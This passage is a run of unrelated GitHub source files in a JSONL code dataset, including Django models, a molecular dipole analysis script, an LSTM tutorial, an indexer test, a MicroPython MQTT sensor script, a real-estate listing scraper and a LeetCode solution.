related_name='orders')\n    offer_amount = get_amount_field()\n    initial_offer_amount = get_amount_field()\n    want_currency = models.ForeignKey(Currency, related_name='orderbook')\n    want_amount = get_amount_field()\n    initial_want_amount = get_amount_field()\n    bid = get_amount_field()\n    ask = get_amount_field() 
# should probably use a Manager for this?\n    filled = models.BooleanField(default=False)\n    cancelled = models.BooleanField(default=False)\n    last_updated = models.DateTimeField(auto_now=True)\n    placed = models.DateTimeField(auto_now_add=True)\n    ip_address = models.IPAddressField()\n\n    def __str__(self):\n        if self.filled or self.cancelled:\n            return \"%s offered %s %s for %s %s\" % (\n                self.balance.account,\n                self.initial_offer_amount,\n                self.balance.currency,\n                self.initial_want_amount,\n                self.want_currency\n            )\n        else:\n            return \"%s offers %s %s for %s %s\" % (\n                self.balance.account,\n                self.offer_amount,\n                self.balance.currency,\n                self.want_amount,\n                self.want_currency\n            )\n\nclass Transaction(models.Model):\n    order = models.ForeignKey(Order, related_name='transactions')\n    from_balance = models.ForeignKey(Balance, related_name='sent_transactions')\n    to_balance = models.ForeignKey(Balance, related_name='received_transactions')\n    amount = get_amount_field() # including commission\n    price_paid = get_amount_field()\n    commission_rate = models.DecimalField(max_digits=5, decimal_places=4)\n    commission_amount = get_amount_field()\n    reversed = models.BooleanField(default=False)\n    linked_transaction = models.OneToOneField('self', null=True)\n    executed = models.DateTimeField(auto_now_add=True)\n\n    def __str__(self):\n        if self.linked_transaction:\n            return \"%s paid %s %s to %s for %s %s\" % (\n                self.from_balance.account,\n                self.amount,\n                self.from_balance.currency,\n                self.to_balance.account,\n                self.linked_transaction.amount,\n                self.linked_transaction.from_balance.currency\n            )\n        else:\n            return \"%s paid %s %s to %s\" % (\n                self.from_balance.account,\n                self.amount,\n                self.from_balance.currency,\n                self.to_balance.account\n            )\n\nclass Deposit(models.Model):\n    balance = models.ForeignKey(Balance)\n    source = models.TextField()\n    amount_received = get_amount_field()\n    amount_deposited = get_amount_field() # less fees\n    accepted = models.BooleanField(default=True)\n    refuse_reason = models.TextField(blank=True, null=True)\n    timestamp = models.DateTimeField(auto_now_add=True)\n\nclass Withdrawal(models.Model):\n    balance = models.ForeignKey(Balance)\n    beneficiary = models.TextField()\n    amount_requested = get_amount_field()\n    amount_withdrawn = get_amount_field() # less fees\n    processed = models.BooleanField(default=False)\n    accepted = models.BooleanField(default=False)\n    refuse_reason = models.TextField(blank=True, null=True)\n    requested = models.DateTimeField(auto_now_add=True)\n    last_updated = models.DateTimeField(auto_now=True)\n","repo_name":"bobquest33/xchgb","sub_path":"txserv/txdb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3094860268","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport numpy as np\nimport time\nimport math\nimport matplotlib.pyplot as plt\nfrom optparse import OptionParser\n\nfrom FrameReader import FrameReader\nfrom Frame import Frame\nimport planeAngles\n\n\ndef polar_coords(xyz, axis1=np.array([0, 0, 0]), axis2=np.array([0, 0, 0]), mod=True):\n    \"\"\"\n    Convert Cartesian coordinates to polar; if axes are given the result is reoriented.\n    axis1 points to the north pole (latitude), axis2 points to 0 on the equator (longitude).\n    If mod, wrap the angles properly within -pi, +pi.\n    \"\"\"\n    tpi = 2*np.pi\n    polar = np.zeros(3)\n    xy = xyz[0]**2 + xyz[1]**2\n    polar[0] = np.sqrt(xy + xyz[2]**2)\n    polar[1] = 
np.arctan2(np.sqrt(xy), xyz[2]) - axis1[1]\n    polar[2] = np.arctan2(xyz[1], xyz[0]) - axis2[2]\n\n    if axis2[1] < 0:\n        polar[2] = polar[2] + tpi\n    if mod:\n        polar[1] = polar[1] % (tpi)\n        polar[2] = polar[2] % (tpi)\n\n    return polar\n\n\ndef print_output(output_all, output, request):\n    for name, val in zip(request, output):\n        print(\"{0}: {1:4.3f}\".format(\"-\".join(name), val))\n\n\ndef graph_output(output_all):\n    rearrange = zip(*output_all)\n    plt.figure()\n\n    for i, item in enumerate(rearrange):\n        plt.subplot(2, 3, i+1)\n        data = plt.hist(item, bins=100, normed=1)\n\n\ndef boltzmannInvert(vals, temp=300):\n    \"\"\"\n    Perform Boltzmann Inversion on a list of numbers assumed to be normally distributed\n    :param vals: Array-like of numbers\n    :param temp: Temperature of simulation in Kelvin, default 300\n    :return: Tuple containing mean value and force constant\n    \"\"\"\n    if not np.any(vals):\n        return (0, 0)\n\n    mdat = np.ma.masked_array(vals, np.logical_or(np.isnan(vals), np.equal(vals, np.zeros_like(vals))))\n    mean = 180 * np.mean(mdat) / np.pi\n    sdev = np.std(mdat)\n    fc = 1.987e-3 * temp / (sdev*sdev)\n\n    return (mean, fc)\n\n\ndef calcAnglesAll(frame, offset=1, natoms=6):\n    \"\"\"\n    Calculate dipole angle for every atom in ring\n    :param frame: Frame instance\n    :param offset: Calculate angle with respect to N around the ring\n    :param natoms: Number of atoms in ring\n    :return: Numpy array containing angles\n    \"\"\"\n    angles = np.zeros(natoms)\n    for i in xrange(natoms):\n        if np.any(frame.atoms[i].dipole):\n            angles[i] = frame.dipoleAngle(i, (i+offset) % natoms)\n    return angles\n\n\ndef calcImpropersAll(frame, natoms=6):\n    \"\"\"\n    Calculate dipole improper angle for every atom in ring\n    :param frame: Frame instance\n    :param natoms: Number of atoms in ring\n    :return: Numpy array containing impropers\n    \"\"\"\n    impropers = np.zeros(natoms)\n    for i in xrange(natoms):\n        if np.any(frame.atoms[i].dipole):\n            impropers[i] = frame.dipoleImproper(i, (i+1) % natoms, (i+5) % natoms)\n    return impropers\n\n\ndef calcAnglesPlane(frame, offset=2, natoms=6):\n    \"\"\"\n    Calculate angle between dipole and plane for every atom in ring\n    :param frame: Frame instance\n    :param offset: Calculate angle with respect to N around the ring\n    :param natoms: Number of atoms in ring\n    :return: Numpy array containing angles\n    \"\"\"\n    angles = np.zeros(natoms)\n    for i in xrange(natoms):\n        if np.any(frame.atoms[i].dipole):\n            norm = frame.planeNormal(i, (i+offset) % natoms, (i+2*offset) % natoms)\n            angles[i] = planeAngles.angleBetweenVectors(frame.atoms[i].dipole, norm)\n    return angles\n\n\ndef calcConeCenters(frame, natoms=6):\n    \"\"\"\n    Finds the centers of the dipole rotation cones for each bead, for each frame.\n    :param frame: Frame instance\n    :param natoms: Number of atoms to use\n    :return: Dipole center vectors\n    \"\"\"\n    vectors = []\n    imp = np.zeros(natoms)\n    ang = np.zeros(natoms)\n    for i in xrange(natoms):\n        if np.any(frame.atoms[i].dipole):\n            tmp = planeAngles.coneCenter(frame.atoms[i], frame.atoms[(i+1) % natoms], frame.atoms[(i+5) % natoms], float(-60), float(5))\n            ang[i] = tmp[0]\n            imp[i] = tmp[1]\n    return (ang, imp)\n\n\ndef main(filename, nframes=-1, natoms=-1):\n    \"\"\"\n    Perform analysis of dipoles in LAMMPS trajectory\n    :param filename: Filename of LAMMPS trajectory\n    :return: Number of frames in trajectory\n    \"\"\"\n    np.set_printoptions(precision=3, suppress=True)\n    reader = FrameReader(filename)\n\n    if natoms < 0:\n        natoms = reader.total_atoms\n    else:\n        natoms = min(natoms, reader.total_atoms)\n\n    if nframes 
< 0:\n nframes = reader.total_frames\n else:\n nframes = min(nframes, reader.total_frames)\n\n angle1 = np.zeros((nframes, 6))\n angle2 = np.zeros((nframes, 6))\n improper = np.zeros((nframes, 6))\n angle3 = np.zeros((nframes, 6))\n # center = []\n center_ang = np.zeros((nframes, 6))\n center_imp = np.zeros((nframes, 6))\n\n frame = Frame(natoms)\n print(nframes)\n for i in xrange(nframes):\n # Read in frame from trajectory and process\n if i % 10 == 0:\n progressBar(i, nframes)\n reader.readFrame(i, frame)\n frame.centreOnMolecule(1)\n angle1_tmp = calcAnglesAll(frame)\n angle2_tmp = calcAnglesAll(frame, 3)\n angle3_tmp = calcAnglesPlane(frame)\n improper_tmp = calcImpropersAll(frame)\n\n center_ang_tmp, center_imp_tmp = calcConeCenters(frame)\n\n # center.append([])\n # center[i].append(calcConeCenters(frame))\n # frame.show_atoms(0,6)\n\n if not np.any(angle1_tmp):\n print(\"AAAAAGH!!!!\")\n\n for j in xrange(6):\n angle1[i, j] = angle1_tmp[j]\n angle2[i, j] = angle2_tmp[j]\n improper[i, j] = improper_tmp[j]\n angle3[i, j] = angle3_tmp[j]\n center_ang[i, j] = center_ang_tmp[j]\n center_imp[i, j] = center_imp_tmp[j]\n\n for j in xrange(6):\n print(\"-\"*5)\n print(boltzmannInvert(angle1[:, j]))\n print(boltzmannInvert(angle2[:, j]))\n print(boltzmannInvert(angle3[:, j]))\n print(boltzmannInvert(improper[:, j]))\n # plotHistogram(reduceArrays(improper[:, j]))\n\n np.savetxt(\"arr1.dat\", angle1)\n np.savetxt(\"arr2.dat\", angle2)\n np.savetxt(\"arr3.dat\", angle3)\n np.savetxt(\"imp1.dat\", improper)\n np.savetxt(\"center_imp.dat\", center_imp)\n np.savetxt(\"center_ang.dat\", center_ang)\n\n # for i in range(nframes):\n # print(\"Frame \" + str(i+1) + \":\")\n # for j in range(5):\n # print(\" Bead \" + str(j+1) + \":\" + str(center[i][0][j]))\n\n # analyseAngles(angle1)\n # analyseAngles(angle2)\n\n return nframes\n\ndef progressBar(num, total, length=50, char_done=\"+\", char_remain=\"-\"):\n \"\"\"\n Print a progress bar\n :param num: Current number of items processed\n :param total: Total number of items to process\n :param length: Length of progress bar - default 50\n :param char_done: Character to use for left of bar\n :param char_remain: Character to use for right of bar\n :return: Nothing\n \"\"\"\n prog = length * (num+1) / total\n remain = length - prog\n print(\"\\r\" + char_done*prog + char_remain*remain, end=\"\")\n\ndef plotHistogram(array):\n plt.hist(array, 100, normed=1, color='blue')\n plt.xlim(-math.pi, math.pi)\n plt.show()\n\n\ndef reduceArrays(array):\n m_array = np.ma.masked_array(array, np.logical_or(np.isnan(array), np.equal(array, np.zeros_like(array))))\n return m_array.compressed()\n\n\nif __name__ == \"__main__\":\n parser = OptionParser()\n parser.add_option(\"-i\", \"--input\",\n action=\"store\", type=\"string\", dest=\"lammpstrj\", default=\"\",\n help=\"Input file - LAMMPS trajectory\", metavar=\"FILE\")\n parser.add_option(\"-n\", \"--natoms\",\n action=\"store\", type=\"int\", dest=\"natoms\", default=\"-1\",\n help=\"Number of atoms to calculate for\")\n parser.add_option(\"-f\", \"--nframes\",\n action=\"store\", type=\"int\", dest=\"nframes\", default=\"-1\",\n help=\"Number of frames to calculate\")\n # parser.add_option(\"-v\", \"--verbose\",\n # action=\"store_true\", dest=\"verbose\", default=False,\n # help=\"Make more verbose\")\n (options, args) = parser.parse_args()\n print(\"=\"*25)\n if not options.lammpstrj:\n print(\"Must provide LAMMPS trajectory to run\")\n sys.exit(1)\n t_start = time.clock()\n nframes = main(options.lammpstrj, 
options.nframes)\n    t_end = time.clock()\n    print(\"-\"*25 + \"\\nCalculated {0} frames in {1}s\\n\".format(nframes, (t_end - t_start)) + \"=\"*25)\n","repo_name":"jag1g13/dipoleAnalysis-bitbucket","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12997632586","text":"# %%\n# code by Tae Hwan Jung @graykode\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\ndef make_batch():\n    input_batch, target_batch = [], []\n\n    for seq in seq_data:\n        input = [word_dict[n] for n in seq[:-1]] # 'm', 'a' , 'k' is input\n        target = word_dict[seq[-1]] # 'e' is target\n        input_batch.append(np.eye(n_class)[input])\n        target_batch.append(target)\n\n    return input_batch, target_batch\n\nclass TextLSTM(nn.Module):\n    def __init__(self):\n        super(TextLSTM, self).__init__()\n\n        self.lstm = nn.LSTM(input_size=n_class, hidden_size=n_hidden)\n        self.W = nn.Linear(n_hidden, n_class, bias=False)\n        self.b = nn.Parameter(torch.ones([n_class]))\n\n    def forward(self, X):\n        input = X.transpose(0, 1)  # X : [n_step, batch_size, n_class]\n\n        hidden_state = torch.zeros(1, len(X), n_hidden)   # [num_layers(=1) * num_directions(=1), batch_size, n_hidden]\n        cell_state = torch.zeros(1, len(X), n_hidden)     # [num_layers(=1) * num_directions(=1), batch_size, n_hidden]\n\n        outputs, (_, _) = self.lstm(input, (hidden_state, cell_state))\n        outputs = outputs[-1]  # [batch_size, n_hidden]\n        model = self.W(outputs) + self.b  # model : [batch_size, n_class]\n        return model\n\nif __name__ == '__main__':\n    n_step = 3 # number of cells(= number of Step)\n    n_hidden = 128 # number of hidden units in one cell\n\n    char_arr = [c for c in 'abcdefghijklmnopqrstuvwxyz']\n    word_dict = {n: i for i, n in enumerate(char_arr)}\n    number_dict = {i: w for i, w in enumerate(char_arr)}\n    n_class = len(word_dict)  # number of class(=number of vocab)\n\n    seq_data = ['make', 'need', 'coal', 'word', 'love', 'hate', 'live', 'home', 'hash', 'star']\n\n    model = TextLSTM()\n\n    criterion = nn.CrossEntropyLoss()\n    optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n    input_batch, target_batch = make_batch()\n    input_batch = torch.FloatTensor(input_batch)\n    target_batch = torch.LongTensor(target_batch)\n\n    # Training\n    for epoch in range(1000):\n        optimizer.zero_grad()\n\n        output = model(input_batch)\n        loss = criterion(output, target_batch)\n        if (epoch + 1) % 100 == 0:\n            print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.6f}'.format(loss))\n\n        loss.backward()\n        optimizer.step()\n\n    inputs = [sen[:3] for sen in seq_data]\n\n    predict = model(input_batch).data.max(1, keepdim=True)[1]\n    print(inputs, '->', [number_dict[n.item()] for n in predict.squeeze()])","repo_name":"graykode/nlp-tutorial","sub_path":"3-2.TextLSTM/TextLSTM.py","file_name":"TextLSTM.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":13202,"dataset":"github-code","pt":"72"} +{"seq_id":"445928499","text":"# coding: utf-8\n\n\"\"\"\nThis test verifies that, for models and clusters that have the MBO parameters\nlicensor, franchise and character (licensor, hero_global, pers_model),\nthe corresponding search literals are set\n\"\"\"\n\n\nimport pytest\nfrom hamcrest import assert_that\n\nfrom market.idx.yatf.matchers.env_matchers import HasDocs\nfrom market.idx.yatf.resources.mbo.models_pb import ModelsPb\nfrom market.idx.yatf.resources.mbo.parameters_pb import ParametersPb\nfrom 
market.idx.models.yatf.test_envs.models_indexer import ModelsIndexerTestEnv\nfrom market.idx.models.yatf.resources.models_indexer.cluster_pictures import ClusterPicturesMmap\n\nfrom market.proto.content.mbo.ExportReportModel_pb2 import (\n ExportReportModel,\n ParameterValue,\n)\nfrom market.proto.content.mbo.MboParameters_pb2 import Category, Parameter\n\n\nMODEL_ID_1 = 1\nMODEL_ID_3 = 3\n\n\n@pytest.fixture(scope=\"module\", params=[90592])\ndef category_parameters(request):\n return Category(\n hid=request.param,\n parameter=[\n Parameter(\n id=15060326,\n xsl_name='licensor',\n published=True,\n ),\n Parameter(\n id=14020987,\n xsl_name='hero_global',\n published=True,\n ),\n Parameter(\n id=15086295,\n xsl_name='pers_model',\n published=True,\n ),\n ]\n )\n\n\n@pytest.fixture(scope=\"module\", params=[90592])\ndef category_parameters_not_published(request):\n return Category(\n hid=request.param,\n parameter=[\n Parameter(\n id=15060326,\n xsl_name='licensor',\n ),\n Parameter(\n id=14020987,\n xsl_name='hero_global',\n published=False,\n ),\n ]\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef models(category_parameters):\n models = []\n\n model1 = ExportReportModel(id=MODEL_ID_1,\n category_id=category_parameters.hid,\n vendor_id=152712,\n current_type='GURU',\n published_on_market=True,\n parameter_values=[\n ParameterValue(\n param_id=15060326,\n xsl_name='licensor',\n option_id=111,\n ),\n ParameterValue(\n param_id=14020987,\n xsl_name='hero_global',\n option_id=222,\n ),\n ParameterValue(\n param_id=15086295,\n xsl_name='pers_model',\n option_id=333,\n ),\n ])\n models.append(model1)\n\n model2 = ExportReportModel(id=MODEL_ID_3,\n category_id=category_parameters.hid,\n vendor_id=152712,\n current_type='GURU',\n published_on_market=True,\n parameter_values=[\n ParameterValue(\n param_id=15060326,\n xsl_name='licensor',\n option_id=555,\n ),\n ParameterValue(\n param_id=14020987,\n xsl_name='hero_global',\n option_id=0,\n ),\n ParameterValue(\n param_id=15086295,\n xsl_name='pers_model',\n ),\n ])\n models.append(model2)\n return models\n\n\n@pytest.fixture(scope=\"module\")\ndef workflow(models, category_parameters):\n resources = {\n 'models': ModelsPb(models, category_parameters.hid),\n 'parameters': ParametersPb(category_parameters),\n 'cluster_pictures_mmap': ClusterPicturesMmap([]),\n }\n with ModelsIndexerTestEnv(**resources) as env:\n env.execute()\n env.verify()\n yield env\n\n\n@pytest.fixture(scope=\"module\")\ndef workflow_not_published_params(models, category_parameters_not_published):\n resources = {\n 'models': ModelsPb(models, category_parameters_not_published.hid),\n 'parameters': ParametersPb(category_parameters_not_published),\n 'cluster_pictures_mmap': ClusterPicturesMmap([]),\n }\n with ModelsIndexerTestEnv(**resources) as env:\n env.execute()\n env.verify()\n yield env\n\n\ndef test_model_bvl_search_literals(workflow):\n assert_that(\n workflow,\n HasDocs()\n .attributes(hyper=str(MODEL_ID_1))\n .literals(licensor='111', hero_global='222', pers_model='333'),\n 'Для модели проставились все три поисковых литерала')\n\n\ndef test_model_wrong_mbo_param_values(workflow):\n assert_that(\n workflow,\n HasDocs()\n .attributes(hyper=str(MODEL_ID_3))\n .literals(licensor='555', hero_global=None, pers_model=None),\n 'Для модели проставился лицензиар, франшиза не проставилась, т.к. 
равна 0, персонажа - нету')\n\n\ndef test_model_not_published_bvl_params(workflow_not_published_params):\n assert_that(\n workflow_not_published_params,\n HasDocs()\n .attributes(hyper=str(MODEL_ID_1))\n .literals(licensor=None, hero_global=None, pers_model=None),\n 'Не проставлены литералы: licensor - нет признака published, hero_global - pulished = False, pers_model - нет параметра в категории')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/yatf/models_indexer/test_search_literals_bvl_models.py","file_name":"test_search_literals_bvl_models.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35223545078","text":"from django.db import models\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete\n\n\nclass Recueil(models.Model):\n class Meta:\n app_label=\"website\"\n verbose_name = \"Recueil\"\n verbose_name_plural = \"Recueils\"\n\n IMPRIME = 'imp'\n MANUSCRIT = 'ms'\n CHOIX_FORMAT = (\n (MANUSCRIT, 'manuscrit'),\n (IMPRIME, 'imprime'),\n )\n\n titre = models.CharField(max_length=255, blank=True, null=True)\n titre_traduit = models.CharField(max_length=255, blank=True, null=True)\n catalogue_id = models.ForeignKey(\"website.Catalogue\", related_name='recueil',blank=True, null=True)\n support = models.CharField(max_length=3, choices=CHOIX_FORMAT, default=IMPRIME)\n ville_edition = models.ForeignKey(\"website.Localisation\", related_name='lieu_d_edition_de',blank=True, null=True)\n datation = models.IntegerField(max_length=4, blank=True, null=True)\n editeur = models.ForeignKey(\"website.Personne\", related_name='editions', blank=True, null=True)\n compositeurs = models.ManyToManyField(\"website.Personne\", blank=True, null=True)\n nombre_pieces = models.IntegerField(max_length=4, blank=True, null=True)\n genre_musical_normalise = models.ManyToManyField(\"website.GenreMusicalNormalise\", related_name='recueils', blank=True, null=True)\n genre_musical_detaille = models.ManyToManyField(\"website.GenreMusicalDetaille\", related_name='recueils', blank=True, null=True)\n reedition = models.ManyToManyField(\"self\", blank=True, null=True)\n remarques = models.TextField(blank=True, null=True)\n projet = models.ManyToManyField(\"website.Projet\", related_name='dans')\n exemplaire = models.ManyToManyField(\"website.Exemplaire\", related_name='autres_exemplaires', blank=True, null=True)\n\n def __unicode__(self):\n return u\"{0}\".format(self.catalogue_id)\n\n@receiver(post_save, sender=Recueil)\ndef solr_index(sender, instance, created, **kwarg):\n import uuid\n from django.conf import settings\n import solr\n\n\n solrconn = solr.SolrConnection(settings.SOLR_SERVER)\n record = solrconn.query(\"type:website_recueil item_id:{0}\".format(instance.id))\n if record:\n # the record already exists, so we'll remove the first\n solrconn.delete(record.results[0]['id'])\n\n recueil = instance\n\n catalogueidentifiant = \"\"\n if recueil.catalogue_id.choix_catalogue != \"\":\n catalogueidentifiant = u\"{0}, {1}\".format(recueil.catalogue_id.choix_catalogue, recueil.catalogue_id.identifiant)\n else:\n catalogueidentifiant = u\"{0}\".format(recueil.catalogue_id.identifiant)\n\n ville = \"\"\n if recueil.ville_edition.nom_ville_normalise_langue !=\"\":\n ville = u\"{0}, ({1})\".format(recueil.ville_edition.nom_ville_normalise_langue, recueil.ville_edition.pays_normalise_langue)\n else:\n ville = 
u\"{0}\".format(recueil.ville_edition.pays_normalise_langue)\n\n projetnom = u\"{0}\".format(recueil.projet.all().values_list('nom_du_projet'))\n\n\n d = {\n 'type': 'website_recueil',\n 'id': str(uuid.uuid4()),\n 'item_id':recueil.id,\n 'titre':recueil.titre,\n 'titre_traduit':recueil.titre_traduit,\n 'support':recueil.support,\n 'datation':recueil.datation,\n 'compositeurs':recueil.compositeurs.all().values_list('nom'),\n 'nombre_pieces':recueil.nombre_pieces,\n 'remarques':recueil.remarques,\n 'catalogue':catalogueidentifiant,\n 'ville_edition':ville,\n 'projet':projetnom,\n\n\n }\n solrconn.add(**d)\n solrconn.commit()\n\n\n@receiver(post_delete, sender=Recueil)\ndef solr_delete(sender, instance, created, **kwargs):\n from django.conf import settings\n import solr\n solrconn = solr.SolrConnection(settings.SOLR_SERVER)\n record = solrconn.query(\"type:website_recueil item_id:{0}\".format(instance.id))\n solrconn.delete(record.results[0]['id'])\n solrconn.commit()\n\n","repo_name":"acTanguy/projet","sub_path":"ricercar/website/models/recueil.py","file_name":"recueil.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10061718167","text":"#!/usr/bin/python3\n\n# Args: my_list = elmnt is printed frm this lst , x(int)\n# Return: num of elmnt\n\ndef safe_print_list_integers(my_list=[], x=0):\n ret_elmnt = 0\n for i in range(0, x):\n try:\n print(\"{:d}\".format(my_list[i]), end=\"\")\n ret_elmnt = ret_elmnt + 1\n except (ValueError, TypeError):\n continue\n print(\"\")\n return (ret_elmnt)\n","repo_name":"Sayere1/alx-higher_level_programming","sub_path":"0x05-python-exceptions/2-safe_print_list_integers.py","file_name":"2-safe_print_list_integers.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26783414530","text":"from machine import Pin, I2C\nfrom dht12 import DHT12\nfrom umqtt.simple import MQTTClient\nimport time\n\ndef poll_sensor():\n i2c = I2C(scl = Pin(5), sda = Pin(4))\n sensor = DHT12(i2c)\n sensor.measure()\n t = sensor.temperature()\n h = sensor.humidity()\n return t, h\n\ndef publish(t, h):\n c=MQTTClient('my_sensor', 'iot.eclipse.org') #change my_sensor!!\n c.connect()\n c.publish('RIFF/phil/temperature', str(t)) # change the topic tree!\n c.publish('RIFF/phil/humidity', str(h)) # change the topic tree!\n c.disconnect()\n\nwhile True:\n t, h = poll_sensor()\n publish(t, h)\n time.sleep(60)\n","repo_name":"philwilkinson40/Micropython_course","sub_path":"code/main_regularex.py","file_name":"main_regularex.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"36785208618","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re\r\n\r\nfrom pymongo import MongoClient\r\n\r\nimport scrapy\r\nfrom scrapy.conf import settings\r\nfrom scrapy.selector import Selector\r\nfrom scrapy.spiders import CrawlSpider\r\nfrom anjuke.items import PageItem, HouseItem\r\n\r\n\r\nclass AnjukeSpider(CrawlSpider):\r\n name = 'anjuke'\r\n start_urls = ['https://m.anjuke.com/gz/sale/']\r\n custom_settings = {\r\n #\"DOWNLOAD_DELAY\": 5,\r\n \"DEFAULT_REQUEST_HEADERS\": {\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\r\n 'Accept-Encoding': 'gzip, deflate, br',\r\n 'Accept-Eanguage': 'zh-CN,zh;q=0.9,en;q=0.8',\r\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU 
iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\r\n        }\r\n    }\r\n    dont_redirect = True\r\n    handle_httpstatus_list = [302]\r\n\r\n    def __init__(self):\r\n        client = MongoClient(settings['MONGODB_SERVER'], settings['MONGODB_PORT'])\r\n        db = client[settings['MONGODB_DB']]\r\n        self.pageColl = db[settings['MONGODB_COLLECTION_PAGE']]\r\n        self.houseColl = db[settings['MONGODB_COLLECTION_HOUSE']]\r\n\r\n    def start_requests(self):\r\n        for i in range(1, 60):\r\n            url = 'https://m.anjuke.com/gz/sale/?from=anjuke_home&page='+str(i)\r\n            result = self.pageColl.find_one({'page_url': url})\r\n            if result:\r\n                urls = result['house_urls']\r\n                for url in urls:\r\n                    if self.check_url(url):\r\n                        yield scrapy.Request(url, callback=self.parse_item)\r\n            else:\r\n                yield scrapy.Request(url, callback=self.parse_page)\r\n\r\n    def parse_page(self, response):\r\n        selector = Selector(response)\r\n        urls = selector.xpath('//a[contains(@class, \"house-item\")]/@href').extract()\r\n        \r\n        item = PageItem()\r\n        item['page'] = re.match(r'.*&page=(\\d*).*', response.url, re.M | re.I).group(1)\r\n        item['page_url'] = response.url\r\n        item['house_urls'] = urls\r\n        yield item\r\n\r\n        for url in urls:\r\n            if self.check_url(url):\r\n                yield scrapy.Request(url, callback=self.parse_item)\r\n\r\n    def check_url(self, url):\r\n        house_id = re.match(r'.*/gz/sale/(\\w*).*', url, re.M | re.I)\r\n        if str(house_id) == 'None':\r\n            return False\r\n        else:\r\n            result = self.houseColl.find_one({'house_id': house_id.group(1)})\r\n            if result:\r\n                return False\r\n            else:\r\n                return True\r\n\r\n    def parse_item(self, response):\r\n        selector = Selector(response)\r\n        housebasic = selector.xpath('//div[@class=\"house-info-content\"]')\r\n        if len(housebasic.extract()) > 0:\r\n            # holds the house information\r\n            item = HouseItem()\r\n            item['house_id'] = re.match(r'.*/gz/sale/(\\w*).*', response.url, re.M | re.I).group(1)\r\n            item['title'] = housebasic.xpath('normalize-space(./div[@class=\"house-address\"]/text())').extract()[0]\r\n            item['tolprice_unit'] = housebasic.xpath('normalize-space(./div[@class=\"house-data\"]/span[1]/text())').extract()[0]\r\n            item['tolprice'] = int(item['tolprice_unit'].replace('万',''))\r\n            item['area'] = housebasic.xpath('normalize-space(./div[@class=\"house-data\"]/span[2]/text())').extract()[0]\r\n            item['mode'] = housebasic.xpath('normalize-space(./div[@class=\"house-data\"]/span[3]/text())').extract()[0]\r\n            item['web_url'] = response.url\r\n\r\n            names = [\r\n                'price',\r\n                'orientation',\r\n                'floor',\r\n                'decorate',\r\n                'built',\r\n                'house_type',\r\n                'agelimit',\r\n                'elevator',\r\n                'only',\r\n                'budget',\r\n                'district',\r\n                'traffic',\r\n            ]\r\n            houseinfo = selector.xpath('//ul[@class=\"info-list\"]/li')\r\n            for i, info in enumerate(houseinfo):\r\n                name = names[i]\r\n                text = info.xpath('normalize-space(./text())').extract()\r\n                a_text = info.xpath('normalize-space(./a[1]/text())').extract()\r\n                if name == 'budget':\r\n                    item[name] = a_text[0]\r\n                elif name == 'district':\r\n                    item[name] = a_text[0] + text[0]\r\n                else:\r\n                    item[name] = text[0]\r\n            # print(item)\r\n            return item\r\n","repo_name":"hsuna/scrapy-anjuke","sub_path":"anjuke/spiders/spiders.py","file_name":"spiders.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16999018345","text":"'''\n637.\nAverage of Levels in Binary Tree\nhttps://leetcode.com/problems/average-of-levels-in-binary-tree/\n'''\n\nclass TreeNode:\n    def __init__(self, 
val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\nclass Solution:\n    def averageOfLevels(self, root: TreeNode) -> list[float]:\n        if not root:\n            return []\n        \n        avgs = []\n        current = [root]\n        while current:\n            nextNode = []\n            avg = sum(n.val for n in current) / len(current) # sum of node values at the current depth / number of nodes\n            avgs.append(avg)\n            while current: # collect the next-depth nodes into the nextNode list\n                node = current.pop()\n                if node.left:\n                    nextNode.append(node.left)\n\n                if node.right:\n                    nextNode.append(node.right)\n            \n            current = nextNode # move down to the next depth\n        \n        return avgs\n\n'''\nRuntime: 36 ms, faster than 99.85% of Python3 online submissions for Average of Levels in Binary Tree.\nMemory Usage: 16.7 MB, less than 29.79% of Python3 online submissions for Average of Levels in Binary Tree.\n'''","repo_name":"ohoon/leetcode_ex","sub_path":"easy/Average_of_Levels_in_Binary_Tree.py","file_name":"Average_of_Levels_in_Binary_Tree.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16666120271","text":"import json, cv2, numpy as np, itertools, random, pandas as pd\nfrom skimage import io\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom tqdm.auto import tqdm\nfrom sklearn import model_selection\nfrom copy import deepcopy\nimport cv2\nimport os\nimport pickle\nfrom scipy.spatial import distance\n\nfeature_list = pickle.load(open('dino-all-feature-list.pickle','rb'))\nfilenames = pickle.load(open('dino-all-filenames.pickle','rb'))\n\nfeature_map = {}\nfor filename, feature in zip(filenames, feature_list):\n    